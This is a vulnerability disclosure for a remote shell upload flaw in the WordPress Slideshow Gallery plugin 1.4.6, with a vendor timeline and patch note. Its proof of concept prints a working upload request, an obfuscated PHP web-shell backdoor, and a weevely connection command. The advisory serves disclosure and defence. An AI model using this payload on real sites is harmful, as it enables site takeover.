WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.
Vendor Homepage: http://tribulant.com/ Software: Slideshow Gallery Version: 1.4.6 Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser. Description: I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system. Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog). Slideshow Gallery 1.4.7 FIX: Possible shell exploit by uploading PHP file as slide Proof of Concept (PoC): 1.An attacker uploads a PHP shell file (i.e. backdoor.php): POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow-slides&method=save HTTP/1.1 Content-Type: multipart/form-data Content-Disposition: form-data; name="image_file"; filename="backdoor.php" Content-Type: application/octet-stream <?php $kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiRrLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSzh"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpezhyRrPSd"; $uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde"); $qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn"); $rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy(); ?> 2.The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php 3.The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor. #weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit 4.Now the attacker has a telnet-like console. Finally, the attacker has the remote control of the vulnerable website. Vulnerability Disclosure Timeline: 2014-08-28: Discovered vulnerability 2014-08-29: Vendor Notification (supp...@tribulant.com) 2014-08-29: Vendor Response/Feedback 2014-08-29: Vendor Fix/Patch 2014-08-30: Public Disclosure Found by: Jesús Ramírez Pichardo @whitexploit http://whitexploit.blogspot.mx/ Date: 2014-08-28
